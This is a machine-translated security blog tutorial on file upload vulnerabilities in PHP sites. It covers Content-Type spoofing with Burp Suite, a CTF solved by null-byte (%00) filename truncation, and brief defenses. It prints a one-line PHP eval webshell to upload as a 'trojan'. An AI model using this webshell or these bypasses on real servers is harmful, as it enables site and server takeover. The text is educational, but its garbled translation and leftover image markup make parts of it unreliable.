File Upload vulnerability principle and example test

0x00 What is File upload

• In order for users to upload files to a Web site, it is like opening another door to a malicious user of a crisis server. Even so, in today's modern Internet Web applications, it is a common requirement because it helps to improve business efficiency. Enterprise Support Portal, to the users of enterprise employees to effectively share files. Allows users to upload pictures, videos, avatars and many other types of files. The more features you provide to users, the greater the risk and opportunity for Web apps to be attacked, which can be exploited by malicious users, gaining access to a specific website, or compromising the likelihood of a server being very high.

0x01 Why file upload has a vulnerability

• When uploading files, if the Server scripting language, the uploaded files are not strictly verified and filtered, it is easy to upload arbitrary files, including uploading script files.

• If it is a normal PHP file, there is no harm to the server.

• PHP can be like other programming languages, you can view the files in the directory, view the contents of the file, you can execute system commands and so on.

• Uploading files, if the server-side scripting language, upload files are not strictly verified and filtered, it is possible to upload malicious PHP files, so as to control the entire site, or even the server. This malicious php file is also known as Webshell.

0x02 where file Upload vulnerability exists

• Improper server Configuration

• Upload vulnerability in open source Editor

• Local file upload restrictions are bypassed

• The filter is lax or bypassed

• File parsing vulnerability causes file execution

• File path truncation

0x03 File Upload instance (local test)

• Nude file uploads

<! doctype html>
650) this.width=650; "Src=" Http://s5.51cto.com/wyfs02/M01/84/75/wKioL1eQ76Sxy2zxAARTCLGSSbw832.png-wh_500x0-wm_3 -wmp_4-s_1928545613.png "title=" 1.png "alt=" Wkiol1eq76sxy2zxaartclgssbw832.png-wh_50 "/>
Set up a local agent with the Burp Suite grab, and by contrast we can see that php < file name > and < file types > corresponding packets in <filename> and <Content-Type> respectively.


 
 

  
  
 
   
File upload with underwear in the upper and lower
 
  
 
 

<! doctype html>
In this code, we detect the type of file upload through the <$_files[' upfile ' [' type ']>, and we know the <content-type of the HTTP packet request header by comparing the first figure with the one in the image > The corresponding is the type of upload file, then we can not modify the contents of the packet to experiment around. OK, now we upload a php word trojan.
<?php@eval ($_post[' xxx '); echo "Dahuiji ...";?>
650) this.width=650; "Src=" Http://s4.51cto.com/wyfs02/M02/84/75/wKiom1eQ8A-heWV_AAN7oia3xR0984.png-wh_500x0-wm_3 -wmp_4-s_1792065708.png "title=" 2.png "alt=" Wkiom1eq8a-hewv_aan7oia3xr0984.png-wh_50 "/>
Look back at the page we know we have successfully bypassed the detection of file types, and the chopper connection was successful


 
  

  
   
 
    
Put on the underwear file upload (a hex <00> truncated CTF)
 
   
 
  

url:http://ctf4.shiyanbar.com/web/upload/
650) this.width=650; "Src=" Http://s2.51cto.com/wyfs02/M00/84/75/wKiom1eQ8FTiYY4vAAKvHgT5rdc341.png-wh_500x0-wm_3 -wmp_4-s_2877217126.png "title=" 3.png "alt=" Wkiom1eq8ftiyy4vaakvhgt5rdc341.png-wh_50 "/>
First we make the above modifications to the captured packets
650) this.width=650; "Src=" Http://s3.51cto.com/wyfs02/M00/84/75/wKioL1eQ8HDSTJYvAAMqvXprP68080.png-wh_500x0-wm_3 -wmp_4-s_1450382984.png "title=" 4.png "alt=" Wkiol1eq8hdstjyvaamqvxprp68080.png-wh_50 "/>
Via 16 binary we know that the 16 binary of <.> is <2e> in <2e> out inserts a byte, and the right-click menu has <insert byte> inserted.
650) this.width=650; "Src=" Http://s1.51cto.com/wyfs02/M01/84/75/wKiom1eQ8JOSXUmnAAI3-KDfuXc717.png-wh_500x0-wm_3 -wmp_4-s_3187912989.png "title=" 5.png "alt=" Wkiom1eq8josxumnaai3-kdfuxc717.png-wh_50 "/>
OK, now we have successfully obtained flag.
Now let's say how this experiment is implemented:
1. Why add <.jpg> after the file and add the modified file name after the packet <uploads/>? PHP is judged by the last <.xxx> when judging the file suffix.  So that we modify the file name, PHP will judge it as a. jpg file so that we can bypass the detection of the file name.    2. Why do we need to add%00 truncation after the file name has been modified?  Although we know that we are uploading a PHP file, but if we do not%00 truncation, we upload the file on the server is in the <xxx.php.jpg> format save that is a picture file, PHP will not parse this file. When we do%00 truncation, the server will be%00 after the <.jpg> to truncate, this is our file will be saved in the form of <xxx.php> on the server, our words of the Trojan is successful when the upload succeeded.


 
  

  
   
 
    
Put on your coat file upload
 
   
 
  
<! doctype html>
Upload a normal picture.
650) this.width=650; "Src=" Http://s5.51cto.com/wyfs02/M01/84/75/wKioL1eQ8Yjz_KUcAAF_fGZhspg079.png-wh_500x0-wm_3 -wmp_4-s_161590072.png "title=" 6.png "alt=" Wkiol1eq8yjz_kucaaf_fgzhspg079.png-wh_50 "/>

Upload a word trojan to bypass detection
650) this.width=650; "Src=" Http://s2.51cto.com/wyfs02/M02/84/76/wKiom1eQ8a_wyICPAAK-fyWsCeQ590.png-wh_500x0-wm_3 -wmp_4-s_640744346.png "title=" 7.png "alt=" Wkiom1eq8a_wyicpaak-fywsceq590.png-wh_50 "/>
Why can't we get around this time? After we truncate the file name, when the packet to Apache, Apache will truncate processing at this time the truncated file name into <xxx.php> when PHP judgment will find the suffix of the file is <php>, and then we failed to upload ....  (The above is only my understanding of the failure of upload, please correct me.)  Welcome to the technical discussion, you can bypass the above methods of students welcome advice. Thanks... ）

0x04 Upload Vulnerability Defense


 
   

  
    
 
     
Opposite file suffix for detection
 
     
To detect a file type
 
     
Detecting the contents of a file
 
     
Set up an upload whitelist
 
    
 
   

This article is from the "Creative Pilgrim" blog, so be sure to keep this source http://dearch.blog.51cto.com/10423918/1828635
File Upload vulnerability principle and example test